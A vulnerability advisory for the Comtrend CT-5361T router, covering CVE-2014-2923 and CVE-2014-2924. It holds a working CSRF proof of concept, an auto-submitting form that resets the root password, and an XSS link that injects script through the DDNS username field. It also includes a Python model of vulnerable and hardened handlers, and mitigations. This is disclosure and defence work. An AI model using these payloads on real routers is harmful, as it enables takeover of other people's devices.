Comtrend CT 5361T Cross Site Request Forgery / Cross Site Scripting

2014-04-21T00:00:00
ID PACKETSTORM:126251
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-04-21T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Comtrend CT 5361T Multiple Vulnerabilities  
[+] Date: 21-04-2014  
[+] Category: WebApp  
[+] CVE: CVE-2014-2923, CVE-2014-2924  
[+] Tested on: Windows 7 Pro  
[+] Vendor: http://www.comtrend.com/  
[+] Product: http://www.comtrend.com/cgi-bin/na/db-searchn.cgi?template=proview1.htm&dbname=product&key2=32&action=searchdbdisplay  
[+] Friendly Sites: na3il.com,th3-creative.com  
  
1.OVERVIEW:  
The Comtrend CT 5361T WiFi router is vulnerable to Cross-Site Request Forgery (the password-change request to password.cgi can be submitted from a third-party page, changing the root password) and to Cross-Site Scripting in the DDNS manager (ddnsmngr.cmd, username parameter).  
  
2.Version:  
CT 5361T (other CT 536X models are likely affected as well)  
Software Version: A111-312SSG-T02_R01  
Wireless Driver Version: 4.150.10.15.cpe2.2  
  
3.Background:  
The CT-5361T is an 802.11g (54 Mbps) wireless and wired ADSL2+ router.  
Four 10/100 Base-T Ethernet ports, an optional USB port and an integrated 802.11g WiFi access point (AP) provide wired and wireless LAN connectivity.  
The CT-5361T also provides security features such as WPA data encryption, a firewall and VPN pass-through.  
It is designed for both residential and business applications that require wireless and wired connectivity to an ADSL broadband network.  
It supports up to 16 contiguous virtual connections, allowing multiple simultaneous Internet connections.  
It also has a TR-068 compliant colour panel and LED indicators, which ease installation and make the modem more user-friendly.  
  
  
4.Proof Of Concept:  
CSRF  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" name="form0" action="http://192.168.1.1/password.cgi?sysPassword=[Your Password]">  
</form>  
</body>  
</html>  
The form carries no fields: the new password travels in the query string of the action URL, and the router accepts the request although nothing ties it to a page served by the router itself. When an administrator who is logged in to the router opens this page, the browser submits the request with that session and the root password is set to the chosen value; then log in as root with the new password.  
  
XSS:  
http://192.168.1.1/ddnsmngr.cmd?action=add&service=1&hostname=blabla&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=bblala&iface=ppp0  
The username parameter is <script>alert('xss')</script> URL-encoded; the DDNS add action is a plain GET, so the same link can be handed to a logged-in user. Screenshot: http://i.imgur.com/plXXpJU.png  
  
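The following is an added illustration for both proof-of-concept requests above; it is not Comtrend firmware code. It models the two handlers in plain Python, each in the vulnerable form the advisory describes and in a hardened form (a per-session anti-CSRF token plus an Origin check for password.cgi, HTML-escaping of stored DDNS fields for ddnsmngr.cmd). The in-memory Session class, the token scheme, the attacker origin, and the assumption that the DDNS manager renders stored entries back into its page are all assumptions made for the demonstration.

```python
# Added illustration for the CT-5361T CSRF and XSS PoCs; NOT Comtrend firmware
# code. The Session object, token scheme, Origin check and DDNS table rendering
# are assumptions for demonstration only.
import hmac
import html
import secrets
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"

# The two requests from the PoC section (scheme added so urlsplit sees a host).
CSRF_POC_URL = "http://192.168.1.1/password.cgi?sysPassword=pwned"
XSS_POC_URL = ("http://192.168.1.1/ddnsmngr.cmd?action=add&service=1&hostname=blabla"
               "&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e"
               "&password=bblala&iface=ppp0")


class Session:
    """State of an authenticated admin session the browser carries (assumed)."""
    def __init__(self, password="admin"):
        self.password = password
        self.csrf_token = secrets.token_hex(16)   # per-session anti-CSRF token
        self.ddns_entries = []


def _query(url):
    # parse_qs percent-decodes, so %3cscript%3e comes back as <script>
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def password_cgi_vulnerable(session, url, origin=None, token=None):
    """password.cgi as the advisory shows it: the new password is read from
    the query string and nothing ties the request to the router's own pages,
    so a form on any site the admin visits can submit it."""
    new_pw = _query(url).get("sysPassword")
    if new_pw is None:
        return 400
    session.password = new_pw
    return 200


def password_cgi_hardened(session, url, origin=None, token=None):
    """Same handler with two standard CSRF defences: the browser-supplied
    Origin must be the router itself, and the request must carry the
    per-session token (compared in constant time)."""
    if origin != ROUTER_ORIGIN:
        return 403
    if token is None or not hmac.compare_digest(
            token.encode(), session.csrf_token.encode()):
        return 403
    new_pw = _query(url).get("sysPassword")
    if new_pw is None:
        return 400
    session.password = new_pw
    return 200


def ddnsmngr_add(session, url):
    """ddnsmngr.cmd?action=add: stores the submitted DDNS entry as-is."""
    p = _query(url)
    if p.get("action") != "add":
        return 400
    session.ddns_entries.append(
        {k: p.get(k, "") for k in ("hostname", "username", "iface")})
    return 200


def ddns_table_vulnerable(session):
    """Renders stored entries into the page verbatim, so the script in the
    username field runs when the DDNS page is viewed."""
    return "".join(
        f"<tr><td>{e['hostname']}</td><td>{e['username']}</td><td>{e['iface']}</td></tr>"
        for e in session.ddns_entries)


def ddns_table_hardened(session):
    """Same table with every user-controlled value HTML-escaped."""
    return "".join(
        "<tr>" + "".join(f"<td>{html.escape(e[k])}</td>"
                         for k in ("hostname", "username", "iface")) + "</tr>"
        for e in session.ddns_entries)


def demo():
    """Runs both handlers against the PoC requests and returns the outcomes."""
    attacker_origin = "http://attacker.example"   # constructed origin of the CSRF page
    s = Session()
    password_cgi_vulnerable(s, CSRF_POC_URL, origin=attacker_origin)
    csrf_vulnerable_changed = s.password == "pwned"

    s = Session()
    password_cgi_hardened(s, CSRF_POC_URL, origin=attacker_origin)
    csrf_hardened_changed = s.password == "pwned"

    s = Session()
    ddnsmngr_add(s, XSS_POC_URL)
    return {
        "csrf_vulnerable_changed": csrf_vulnerable_changed,
        "csrf_hardened_changed": csrf_hardened_changed,
        "xss_script_in_vulnerable_page": "<script>" in ddns_table_vulnerable(s),
        "xss_script_in_hardened_page": "<script>" in ddns_table_hardened(s),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The hardened password handler still changes the password when the request carries the router's own Origin and the session's token, which is what a legitimate form served by the router would supply; the cross-site form from the PoC has neither. Token comparison uses hmac.compare_digest so a wrong token is rejected in constant time.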
5.Solution(s):  
No fix is available: the vendor and ISP did not respond before publication (see the timeline). Until a firmware update is released, do not expose the web interface to the WAN, restrict it to trusted LAN hosts, and do not browse other sites while logged in to the router.  
  
6.TIME-LINE:  
16-04-2014: Vulnerability was discovered.  
16-04-2014: Contact with vendor and ISP.  
17-04-2014: No Reply.  
18-04-2014: No Reply.  
18-04-2014: ANOTHER contact with vendor and ISP.  
19-04-2014: No Reply.  
20-04-2014: No Reply.  
20-04-2014: CVE(s) Requested.  
21-04-2014: CVE assigned.  
21-04-2014: Vulnerability published.  
  
7.Greetings:  
Xmax-tn  
Xtech-set  
N43il  
Sec4ver,E4A Members  
`